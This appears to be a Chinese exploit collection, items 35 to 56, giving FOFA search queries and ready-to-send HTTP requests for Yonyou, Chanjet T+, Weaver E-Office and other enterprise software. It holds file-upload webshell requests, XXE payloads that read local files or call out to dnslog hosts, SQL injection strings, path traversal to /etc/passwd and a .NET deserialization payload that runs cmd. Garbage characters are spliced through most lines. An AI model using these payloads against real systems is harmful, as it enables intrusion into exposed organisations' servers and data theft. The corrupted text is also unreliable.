( u2 [( [# B3 F( M# ?35. 用友NC-Cloud importhttpscer任意文件上传
- _( a3 B, w2 h$ |& B& \3 }4 CFOFA:app="用友-NC-Cloud"/ j0 u7 w; {# v7 a: q
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1' q u0 t2 g2 ]% H& r
Host: 203.25.218.166:88884 t$ d# V0 a7 S/ L& r I% c$ {
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info6 B3 Z/ V" ^& I$ K$ _& O4 h) m
Accept-Encoding: gzip, deflate4 b# ]* M* b, h K4 } V
Accept: */*' O0 D4 D- R. n4 w
Connection: close D+ P, F+ Q% J7 P9 f! Q
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
7 c+ N+ M/ l+ I- ~Content-Length: 1906 Z" \$ s3 ~" U) R
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
) H# @0 P5 C" k' s$ S$ q+ X4 Z% [$ p+ ~) U9 }
--fd28cb44e829ed1c197ec3bc71748df0( p7 r; Z$ {5 L _; R' p9 d
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
& K& [4 v. l5 w6 c: x' @( E* V5 ~- Q$ N% }! v" w: R+ a0 A
<%out.println(1111*1111);%>1 n3 x, |, V4 F
--fd28cb44e829ed1c197ec3bc71748df0--5 ], W8 q2 D6 k& b' i
6 C( o9 u8 u K4 J. J K- C
8 x3 Y6 f7 n* y4 M1 \% R8 r+ k: {36. 用友NC-Cloud soapFormat XXE
; t0 ~ ]% ~- a4 {% A6 [FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
4 W2 w8 Q4 t6 N# {POST /uapws/soapFormat.ajax HTTP/1.1% P3 B! @- K, [
Host: 192.168.40.130:8989
4 }1 ~+ |6 F3 K/ u% zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
" J8 K6 n: W4 C4 T% s; H; KContent-Length: 263
) `$ a4 x! D" O/ xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 o, H3 C. R$ F- i" q0 iAccept-Encoding: gzip, deflate
n8 r4 e+ f# x. n" dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 X. p3 N8 P3 H5 v7 N( J! {
Connection: close
: h) D" l) p$ \Content-Type: application/x-www-form-urlencoded7 i& K/ i6 w" i0 Y" u, P
Upgrade-Insecure-Requests: 17 L* D8 r+ v3 F! [# l/ B
: b2 u, T" s' |5 U' q
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
* k% r8 L/ j8 j/ i, k# s! q |" H
5 A% K7 W F+ j; u- c e
; k+ u* F: w: `7 O# h37. 用友NC-Cloud IUpdateService XXE
! l3 x3 h5 a7 l S1 WFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"* Z+ S3 U4 `& z) A; {9 ]% _
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
& }; O8 ]' r& u/ Z; f0 THost: 192.168.40.130:8989
1 H/ {: t |) s1 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36, S4 a7 ~0 ^# N& _1 W& o
Content-Length: 421. }; C& b1 V. q% X0 G1 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ k6 y% p* k# b4 \/ P' t
Accept-Encoding: gzip, deflate7 A5 L. Z% g* W* ~ D
Accept-Language: zh-CN,zh;q=0.9
9 w2 c+ U0 x# ^2 C/ R) ?& X, X( qConnection: close
: N- y! ^/ Q5 I8 P3 kContent-Type: text/xml;charset=UTF-8
+ M- k5 h9 H7 D6 M A% |SOAPAction: urn:getResult
3 |0 G5 N0 u4 Q" s8 aUpgrade-Insecure-Requests: 1
+ _& f$ ]- q6 u) M, h6 K- f I
9 f# B3 Q1 ]( n c1 ^: Z, w<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
4 @+ i! e# O1 ?$ V; |<soapenv:Header/>
O5 L8 M8 g) K7 v) J, o<soapenv:Body>- a# @# k, s! g( I1 K6 h
<iup:getResult>; p% A0 A- E; f3 e$ x6 I
<!--type: string-->& h8 @% l1 b+ U; E) |: X
<iup:string><![CDATA[
+ }, y' H% U% l! N! J<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>7 U( ~" A U% o
<xxx/>]]></iup:string>- B: C5 z! G, h+ A
</iup:getResult>
. g( c- ?. `+ \, R; A1 a) D* ^- v1 a. Q</soapenv:Body>- P, P. {) e. E
</soapenv:Envelope>
& C8 C+ t, p: \/ ^; l* @% h
7 k) h" M' R- h3 W: W
, g0 e7 e f1 ~* {4 F# A
* s8 X' \7 Q7 x4 s38. 用友U8 Cloud smartweb2.RPC.d XXE) j# _- T7 p8 l2 C+ J( ^ s
FOFA:app="用友-U8-Cloud"
. f* ]9 A/ s0 i, F8 y) DPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1: O0 Z; X# K4 E" ]8 j
Host: 192.168.40.131:8088
8 S; L5 I9 |" M, h9 B. f" X5 y0 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25- h% C5 @, j- g+ Q
Content-Length: 2601 `9 z% X) Q8 {( l4 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b35 M0 W0 R; e% o. u; C
Accept-Encoding: gzip, deflate g4 b7 W' d7 m! }. |; D
Accept-Language: zh-CN,zh;q=0.9
: p" n! O( \5 M7 b* CConnection: close" r: a1 E% N/ K g$ K/ W" W
Content-Type: application/x-www-form-urlencoded
' x9 e) U: E0 t( x/ ~
8 b, i8 x' I6 ~& O9 [__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
' V O5 p* ]3 ?9 N& e( ^2 y; O& o! [+ }
" C9 ^, g* G5 v4 \: }39. 用友U8 Cloud RegisterServlet SQL注入
D% o+ y: Z! \* H4 u1 D p, fFOFA:title="u8c"
( H* u/ ~& o V5 T; pPOST /servlet/RegisterServlet HTTP/1.1
8 z! A3 `1 ~& XHost: 192.168.86.128:8089
4 G; k7 u& I; g% p6 i8 m. YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
. a# H% L z- g$ q( J: K6 B, pConnection: close
. }- C0 p; h. O* V: E) c! ^Content-Length: 85
% B; X( o- z) ~* a0 N5 c0 vAccept: */*5 C3 p( ]( n0 c( i, d# r$ ]' _
Accept-Language: en. b5 ~6 g: L7 V
Content-Type: application/x-www-form-urlencoded
. Y1 v1 @. f# G2 U) NX-Forwarded-For: 127.0.0.1# B# e" ~7 |# b
Accept-Encoding: gzip& b' o/ E- @8 m; {+ x" B: u
- ?- R3 n4 j/ _+ w- g
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
: ^$ D& \! Y% F5 `+ X$ z& ?5 h# E. `, x; A. u' d+ v5 B# p
% I' G; q% H- _# o9 H/ w/ {& o4 m40. 用友U8-Cloud XChangeServlet XXE; I1 c# D- b% r" T# X/ x
FOFA:app="用友-U8-Cloud"
3 u0 U8 c7 C' N1 R7 d9 mPOST /service/XChangeServlet HTTP/1.1
/ B, S- m9 z8 m6 zHost: x.x.x.x3 _6 x" @( g6 ]% [. z. p7 o0 `4 G
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: V" o9 ?0 g* w5 K8 z. |! H+ ^Content-Type: text/xml
3 @, ^0 i0 N: O0 x; \! ~- oConnection: close
/ @. K$ W; A6 c1 N$ i0 d; ]
. O' r! j# A4 E8 d<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r> D6 _& z# \- y
9 N% {- Q. T1 F+ w) U( z5 A
5 R u% A1 j0 }7 t41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 C& ?) B! X. }/ o2 n, UFOFA:app="用友-U8-Cloud") ^) @+ G. Y$ O# H' r1 F: E
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
0 u: E/ ]4 |6 X \6 ]Host:
) k* X5 g& W! f$ d5 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ c# F4 Y) E4 a5 }
Content-Type: application/json
+ h2 w" A' l5 I2 `/ Z- Y* k8 JAccept-Encoding: gzip! f3 o% A; u# {! l0 z4 E
Connection: close
: x4 b: h- m" V" \; z
3 H4 o8 Q1 n1 Q0 _9 J# W) S& \$ l6 a- A4 ], P9 I
42. 用友GRP-U8 SmartUpload01 文件上传. N- ^% B! b" s$ }7 B+ e1 L
FOFA:app="用友-GRP-U8"
( r4 g4 U7 o! i) WPOST /u8qx/SmartUpload01.jsp HTTP/1.1% ~$ W6 u9 F- c9 ] ~
Host: x.x.x.x |2 v2 U# P: U& `4 y4 ^" }1 e1 e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
" c) ]1 z b H3 I2 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36$ |% W5 w8 G" c1 L: k( F
" a1 \2 @3 d, L8 T, C( n( OPAYLOAD
- Y( ^. @, B+ p' N* |9 Y- I) G. @/ `9 ~) d0 @( k
4 K0 K( ]% T# xhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml% ?. R/ R! Y% D8 k N1 d
, q, m0 {. R4 q& E# M
43. 用友GRP-U8 userInfoWeb SQL注入致RCE+ M3 h. l& k5 o9 `- g
FOFA:app="用友-GRP-U8"4 t3 @/ S) f3 ?) u7 {3 g- ~
POST /services/userInfoWeb HTTP/1.1
; L6 T% U4 k5 p4 ?9 a WHost: your-ip
2 r; B0 N; L/ P5 e6 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 f& s: a, A' U( L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 e% P5 m/ R* |
Accept-Encoding: gzip, deflate/ a. H6 e" Z2 k8 t5 y- l' E( X3 J8 [
Accept-Language: zh-CN,zh;q=0.9
, i H2 z& L% M3 xConnection: close
8 d% i% Y: q9 C9 M8 H7 I, B. V! oSOAPAction:% y2 y* t) y6 c) c- Q6 K2 |
Content-Type: text/xml;charset=UTF-8
& x" B" F- Y% X3 U! G. ?# J: ?& z" E/ z' T# Z
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
5 }1 M& J, h1 ^& f D <soapenv:Header/>- G* v/ Y3 _+ W7 J N, |, Q1 `
<soapenv:Body>
/ c& z* r1 {4 f <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">4 t$ }% B8 r/ L8 _
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
5 V2 v* r6 F4 C# l </ser:getUserNameById>
5 k( M7 t1 N/ ], Z+ ~ </soapenv:Body>
3 \9 s! b1 @% j: ^! r+ s6 U</soapenv:Envelope>
, v1 ~ \. v) r& K1 y# X- q9 _9 J9 @8 n
% H8 K1 U# b: R; K& W9 d4 @6 w) F44. 用友GRP-U8 bx_dj_check.jsp SQL注入
, W& c' q1 u% u2 l9 B2 H+ G0 Q# Z7 \FOFA:app="用友-GRP-U8"4 M7 g5 J8 \( M% t* }% F
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1, V1 x t) k/ o/ `$ ]7 e) P! e- S
Host: your-ip* B. W, H% _7 S3 [! }% \3 L3 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36) H4 b% w; u8 U% J9 c/ m/ o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* n& s- m+ W0 I* S7 ?Accept-Encoding: gzip, deflate
5 h2 b ~! Q1 T1 K% h9 n+ MAccept-Language: zh-CN,zh;q=0.9
" x8 `+ M0 O& o- Z+ X% \Connection: close3 C$ a2 l; O. X2 O- R. T
+ u1 T, M0 Y$ `; c6 Z
$ @* p4 t8 c- A* r2 v5 Q
45. 用友GRP-U8 ufgovbank XXE a( N) |: {/ U1 m3 L8 h0 S7 _5 W* X
FOFA:app="用友-GRP-U8"/ Q/ e" y4 g# k& g
POST /ufgovbank HTTP/1.1/ O, e: H2 q. s# _0 g( i
Host: 192.168.40.130:222
, I# U6 V4 ~9 j- e5 \; T3 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0: Z- ~ J2 e# e1 y' q5 z! M
Connection: close
0 L$ z2 ?. E" _& w% PContent-Length: 1612 V c: ~3 ]& h9 ~. s9 @/ E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; h* o: g, o- H! ^' X( l" [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 \0 j) F- A* l/ _, } ?& z
Content-Type: application/x-www-form-urlencoded$ l% M3 U4 b# X& I
Accept-Encoding: gzip/ L7 O0 n! ^$ R# q& ^
7 ?' T( Z. T/ PreqData=<?xml version="1.0"?>* l+ j# ~2 g$ w; j8 ]
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest D# H, M* S7 q3 `
4 J2 l8 O& o3 l/ l' L; s* k/ i$ S5 T6 @4 |8 f3 P1 P. i
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% c7 N- a/ f1 i, JFOFA:app="用友-GRP-U8"
- U7 q! P \4 w+ W: \9 [, WGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.15 x$ R! C: ?2 G8 ?1 o( e
Host: your-ip
1 R$ O5 I, l J! oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36# \" ?+ ^- L; j1 Q" `4 T2 P& y5 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 u0 `( I( F; R2 `$ L8 ]
Accept-Encoding: gzip, deflate9 l! V, I" \8 f0 y% j
Accept-Language: zh-CN,zh;q=0.9
( ^% y) v) ?, @% f9 }- r: \+ c1 @Connection: close3 E+ S0 \" N& a% v
! q: z) t/ m+ f( |6 j3 B
* j1 d" q: X3 o
47. 用友GRP A++Cloud 政府财务云 任意文件读取2 Q9 G5 n" `: K2 O1 W: w" `* @
FOFA:body="/pf/portal/login/css/fonts/style.css"
! z" @; X% e9 `! f( X* }% zGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.11 Z( ?3 |0 ^+ K" K
Host: x.x.x.x
8 R0 L* `. z* \5 k( s7 b8 yCache-Control: max-age=0
% H1 Y2 q5 K d+ kUpgrade-Insecure-Requests: 1
! n; d n2 u, \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 v# _( i- p& n! D2 u X! ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 N! A* M3 A4 J; Q7 i/ ]# a9 x' b9 B+ x
Accept-Encoding: gzip, deflate, br6 X7 }( [$ _0 O/ Y _% d- ?
Accept-Language: zh-CN,zh;q=0.94 G- q3 O4 R/ w: C) }
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
3 t, T0 d. F+ K8 s+ u# k, bConnection: close
" k4 R8 K: h- B4 U% G: a& i3 |$ L7 I
- N& G/ O0 V9 `) b
0 T' L1 u2 k5 i# U' T
48. 用友U8 CRM swfupload 任意文件上传/ U% T- O: y) |6 m
FOFA:title="用友U8CRM"- l+ |! j2 `5 }1 G; x1 [
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
4 p& N, z2 X6 @( eHost: your-ip
* n3 P* I- R/ o' _ k. eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! X! l: ^0 @& V7 L3 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! m# c* j, W6 H$ j# J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 s7 `; J. A; N
Accept-Encoding: gzip, deflate; }' T/ V+ V9 k) t( o4 i' k* v
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
7 N+ l0 D! |0 e- U- p------269520967239406871642430066855/ E; k& Y3 E7 ~" u8 s
Content-Disposition: form-data; name="file"; filename="s.php"8 N% Z0 J7 Y0 M/ C# ^: P
1231
5 O1 Z( @2 h$ ZContent-Type: application/octet-stream5 R9 C- d2 k. [/ m+ d: u9 R
------269520967239406871642430066855
' t5 ~+ y g6 G4 {Content-Disposition: form-data; name="upload"5 }. n! d. W, O/ X$ q* J
upload' p$ ~1 i2 z. ~+ y3 W+ P
------269520967239406871642430066855--
. @9 B& C1 r. ~5 k- A! a! Z* A; S3 D. @2 Z O% {4 y$ z, Z
/ a( [3 ]: {# C% v; Q h2 @) H% S49. 用友U8 CRM系统uploadfile.php接口任意文件上传
- N# F! o1 q2 K' ]( I0 f# F D3 MFOFA:body="用友U8CRM" |9 c! I9 @: m5 l# l+ `, U' W0 }
4 o% B0 q; w* }6 @" c/ ePOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1, f' [8 O. H; ?$ \" c- ^
Host: x.x.x.x2 W: h, T+ F' K$ p9 {; h* [# ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( N/ Q% p( ?1 u: ~Content-Length: 329
' C3 S7 s x5 s YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ G+ e4 m/ i+ Z. L EAccept-Encoding: gzip, deflate3 O4 Z) ]: G" W: A! P7 s. u0 Z1 K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 }: l5 t) v) H5 {
Connection: close1 d9 ?0 c; X+ A7 e% e
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
3 z+ w X6 f* R$ U1 M0 I
) X( x( m, [% q% V; i4 H9 x-----------------------------vvv3wdayqv3yppdxvn3w
, z4 h' O# t2 n; u" t. ~Content-Disposition: form-data; name="file"; filename="%s.php "
) Z$ ]4 [7 V/ wContent-Type: application/octet-stream: u- V% }- `- o& ] W
! J; G, d' ~% E4 R' ]. u) b: q; ?& |& f
wersqqmlumloqa1 O# I5 V' N0 _ q, y
-----------------------------vvv3wdayqv3yppdxvn3w2 @4 H0 T/ Q/ k( @8 j, [3 m
Content-Disposition: form-data; name="upload", M/ Z+ D, o) X0 A9 M7 Y& @. y
) t+ {6 v I; v" X0 b
upload
. N( w2 b7 J B-----------------------------vvv3wdayqv3yppdxvn3w--3 v3 p p v, H; r0 f0 m# p
: P: Z& g* k* w
( ^/ Z, r( ]; s$ ohttp://x.x.x.x/tmpfile/updB3CB.tmp.php8 g3 _# @# C2 ]
( `) q/ ]( r- t, I+ J
50. QDocs Smart School 6.4.1 filterRecords SQL注入
( B5 E+ _ W# c) dFOFA:body="close closebtnmodal"
/ n+ {% I O3 R7 K' C5 ?0 d, T: qPOST /course/filterRecords/ HTTP/1.17 m5 m# W" Z# G9 k( l- f
Host: x.x.x.x) X4 c: h( B. r1 t) }! u' `# ~6 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 v" o7 S( j& a% l* L3 g! K' YConnection: close
/ M3 Z6 a; T v3 W# CContent-Length: 2246 Q+ u5 x7 n' F0 l7 S9 W5 ~1 k0 }( S( D
Accept: */*
. V% x% y5 G7 u$ j% |; i: AAccept-Language: en* _7 S" @4 D3 d0 }; o* \- ~- K
Content-Type: application/x-www-form-urlencoded9 G3 y. O3 ^! o2 i' J
Accept-Encoding: gzip7 {, P7 d' U7 q9 H6 v) `2 L
$ X1 X$ B, i6 h# ?/ Ksearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
4 y, p7 T, g8 O- x/ ?9 ^% B5 X8 g& H+ ?/ w7 F( z, f
" x* m# k) ]! p, y: O' u51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
6 `3 M4 F+ Z- P+ d) P8 rFOFA:app="云时空社会化商业ERP系统"
* _" `- p8 x7 G6 C# zGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
O' J( ~& F% {; S, i0 M/ B' IHost: your-ip
; p3 ~9 s; i B( P: X2 V& Z+ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
$ Y6 S9 y7 C4 H, m) w' |6 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 ^7 N' X/ K# H* G0 u6 d! ~; [0 [Accept-Encoding: gzip, deflate; t4 o6 l2 [2 H# a( f
Accept-Language: zh-CN,zh;q=0.9
) _4 L) G0 g( A7 X. r2 o5 YConnection: close
% U4 K. m+ M$ A: I# i' Z3 ]! W
( y$ j q, i7 F7 m W. K F: S' _9 M7 C
52. 泛微E-Office json_common.php sql注入3 } D# B% p) y+ R5 X/ X7 k, P
FOFA:app="泛微-EOffice"' F" k/ I) n2 m: f
POST /building/json_common.php HTTP/1.1/ p% u5 ^" O& N2 C! n
Host: 192.168.86.128:8097
+ }& S' P" T' \5 U$ h* g$ CUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) P+ ]$ e- r4 _3 S6 M" f
Connection: close
: o& E. `$ b: `Content-Length: 87' w; q, N2 o5 n) j6 ~, P+ A
Accept: */*% `* c% E4 E N% g
Accept-Language: en
9 @% d) z9 r; Z, J; J8 o$ lContent-Type: application/x-www-form-urlencoded; ?) a J3 ]- {* z
Accept-Encoding: gzip/ I$ T# K& n! H7 `$ T8 n3 Q4 G
; {8 N% p F* V; I9 ?
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ J/ }% Z) b6 L; l" @, K5 o% x- s3 K6 Y9 F
: H7 C' ?! k: s( n# s$ ?& v53. 迪普 DPTech VPN Service 任意文件上传
( S5 p/ u# v/ F; b. mFOFA:app="DPtech-SSLVPN"
' b' C1 P" N. ^* v# E& ?; u. `/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; ^! r# l) n1 m8 o- L
8 n# e$ Q! G$ E; L2 o1 T
) b0 ]& J, h! j. f5 c' L54. 畅捷通T+ getstorewarehousebystore 远程代码执行% r: I. b# t7 v, O( R
FOFA:app="畅捷通-TPlus"
! c- b, u9 G1 V; B第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件5 T, Y% |/ T: h& g6 G& r
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"4 d- i0 O2 O9 f+ \0 _7 u+ w
1 S. k7 t# i, p; ^/ `( J
1 p2 r" S9 Y9 ^* h5 K, D
完整数据包/ [4 {# E2 ?; G' m* V g& ?
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1/ W) O& Z. C0 w' J' f
Host: x.x.x.x
1 K5 |( T7 t9 S* T+ D2 b& X- E3 M# pUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F& _+ w' b0 Y9 y& `9 ]+ a) \0 {
Content-Length: 593
4 H& B0 s* @* N! _: d6 D: _
. F6 p! O6 ^9 |8 m{9 Z( l) T& r4 ]2 \; ]7 A+ p
"storeID":{$ G$ h! E+ X$ V4 t. S
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
+ i+ ^* x5 K9 H "MethodName":"Start",
/ E, s* b" E+ J, [ "ObjectInstance":{$ ^" s6 K+ F2 H1 A! n$ m
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) Q# d( U5 K/ P7 |4 }/ I "StartInfo":{
4 U4 y1 S! E' p* o "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" q# \4 Y. X! F7 S3 M "FileName":"cmd",
' _ D# K; S+ _- X6 L- ^1 f "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"+ f* p6 f# \0 Z/ a
}$ c! ]3 X2 d+ A, [ C) V# @
}
\1 I) ]% O- x0 ]/ w. j }
& h' s( a! _, d}
4 x( F& N. x1 G% T5 T5 O7 R" G1 S9 t6 G& y- A
% J7 g6 G( K( S. \4 m4 r) K9 A% v y第二步,访问如下url
! j0 p% o0 O) z5 b5 t2 @0 X/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt; U9 [9 u/ C- w( M# n
' e; l/ x& \) d6 w2 F$ T8 [9 Z# U
9 q, k; r6 }) I2 K- r/ M55. 畅捷通T+ getdecallusers信息泄露7 U7 {8 v2 O0 L. q f$ x$ A
FOFA:app="畅捷通-TPlus"# m( J) x" B1 h' P+ s2 W
第一步,通过
$ c& D; V8 F+ k/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
1 ?5 w; J) @4 c' V第二步,利用获取到的Cookie请求
: y d+ I4 Z r: O" v. s/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
9 k" ~& g _9 q# v5 X. c, T: o
# u( \: _" l2 P! ]9 N3 A56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE1 n# `! h8 F) e) l3 c
FOFA: app="畅捷通-TPlus"+ V4 t( x- ]5 z* }8 I6 p3 i
